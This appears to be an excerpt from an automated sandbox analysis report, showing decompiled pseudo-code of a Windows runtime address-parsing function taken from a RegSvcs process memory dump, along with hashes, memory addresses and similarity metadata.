                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                • API String ID: 0-3177188983
                                                • Opcode ID: 681d2a02427bda8d1621cd781572c848d5fea6395e7e22da336dd25cee95e02a
                                                • Instruction ID: 6ed2715f728fe42cf95826ace49266a6f42f9503778d2ab015833e910d404d81
                                                • Opcode Fuzzy Hash: 681d2a02427bda8d1621cd781572c848d5fea6395e7e22da336dd25cee95e02a
                                                • Instruction Fuzzy Hash: BE41D470A00204ABDB24EBA8CC89FAA77B9FF45720F208619F565DB3D1D734E9418766
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0089FCC9 Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0089FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E0089EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E0089EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E0089685D(_t167, 4) == 0) {
								if(E0089685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E0089685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E0089685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E00878980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E0086DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E0089EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E0089EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

























                                                0x0089fcd1
                                                0x0089fcd6
                                                0x0089fcd9
                                                0x0089fcdc
                                                0x0089fcdf
                                                0x0089fce2
                                                0x0089fce5
                                                0x0089fce8
                                                0x0089fceb
                                                0x0089fced
                                                0x0089fced
                                                0x0089fcf3
                                                0x00000000
                                                0x00000000
                                                0x0089fcfc
                                                0x0089fcfe
                                                0x0089fdc1
                                                0x008cecbd
                                                0x00000000
                                                0x008ceccc
                                                0x008ceccc
                                                0x008cecd2
                                                0x00000000
                                                0x00000000
                                                0x008cecdf
                                                0x008cece0
                                                0x008cece4
                                                0x008ceceb
                                                0x008cecee
                                                0x008ceca8
                                                0x008ceca8
                                                0x008cecaa
                                                0x0089fd76
                                                0x0089fd79
                                                0x0089fdb4
                                                0x0089fdb5
                                                0x0089fdb6
                                                0x00000000
                                                0x0089fdb6
                                                0x0089fd7e
                                                0x008cecfc
                                                0x0089fe2f
                                                0x00000000
                                                0x0089fe2f
                                                0x008ced08
                                                0x008ced0f
                                                0x008ced17
                                                0x008ced1b
                                                0x00000000
                                                0x008ced1b
                                                0x0089fd88
                                                0x00000000
                                                0x00000000
                                                0x0089fd94
                                                0x0089fd99
                                                0x0089fda1
                                                0x00000000
                                                0x00000000
                                                0x0089fdb0
                                                0x00000000
                                                0x0089fdb0
                                                0x008cecbd
                                                0x0089fdc7
                                                0x0089fdcb
                                                0x00000000
                                                0x0089fdd7
                                                0x0089fde3
                                                0x0089fe06
                                                0x008b1fe7
                                                0x00000000
                                                0x00000000
                                                0x008b1fef
                                                0x008b1ff0
                                                0x008b1ff4
                                                0x008b1ff7
                                                0x008b1ffa
                                                0x008b1ffd
                                                0x008b2000
                                                0x00000000
                                                0x00000000
                                                0x008cecf1
                                                0x00000000
                                                0x008cecf1
                                                0x00000000
                                                0x0089fe06
                                                0x0089fde8
                                                0x0089fdec
                                                0x0089fdef
                                                0x0089fdf2
                                                0x00000000
                                                0x0089fdf2
                                                0x0089fdcb
                                                0x0089fd04
                                                0x0089fd05
                                                0x008cec67
                                                0x00000000
                                                0x00000000
                                                0x008cec6f
                                                0x00000000
                                                0x008cec6f
                                                0x0089fd13
                                                0x0089fd3c
                                                0x0089fd40
                                                0x008cec75
                                                0x008cec7a
                                                0x00000000
                                                0x008cec8a
                                                0x008cec8a
                                                0x008cec90
                                                0x008cecb2
                                                0x0089fd73
                                                0x0089fd73
                                                0x00000000
                                                0x0089fd73
                                                0x008cec95
                                                0x00000000
                                                0x00000000
                                                0x008ceca1
                                                0x008ceca4
                                                0x008ceca5
                                                0x00000000
                                                0x008ceca5
                                                0x008cec7a
                                                0x0089fd4a
                                                0x00000000
                                                0x0089fd6e
                                                0x0089fd6e
                                                0x0089fd71
                                                0x00000000
                                                0x0089fd71
                                                0x0089fd4a
                                                0x0089fd21
                                                0x008aa3a1
                                                0x00000000
                                                0x008aa3a1
                                                0x0089fd36
                                                0x008b200b
                                                0x008b2012
                                                0x00000000
                                                0x00000000
                                                0x008b2018
                                                0x00000000
                                                0x008b2018
                                                0x00000000
                                                0x0089fd36
                                                0x0089fe0f
                                                0x0089fe16
                                                0x008aa3ad
                                                0x00000000
                                                0x00000000
                                                0x008aa3b3
                                                0x008aa3b3
                                                0x0089fe1f
                                                0x008ced25
                                                0x008ced86
                                                0x00000000
                                                0x00000000
                                                0x008ced91
                                                0x008ced95
                                                0x008ced95
                                                0x008ced9a
                                                0x008cedad
                                                0x008cedb3
                                                0x008cedba
                                                0x008cedc4
                                                0x008cedc9
                                                0x00000000
                                                0x008cedcc
                                                0x008ced2a
                                                0x008ced55
                                                0x00000000
                                                0x00000000
                                                0x008ced61
                                                0x008ced66
                                                0x008ced6e
                                                0x00000000
                                                0x00000000
                                                0x008ced7d
                                                0x00000000
                                                0x008ced7d
                                                0x008ced30
                                                0x00000000
                                                0x00000000
                                                0x008ced3c
                                                0x008ced43
                                                0x008ced4b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: __fassign
                                                • String ID:
                                                • API String ID: 3965848254-0
                                                • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                • Instruction ID: 74a5bcf55747ed5f7a5f3b9a369b5e9679aad569e15c65c2b1e24ff7d55fb952
                                                • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                • Instruction Fuzzy Hash: F6916F71D04209EBDF28EF58C8456EEB7B4FF55315F28807AD612EA253E7309A41CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%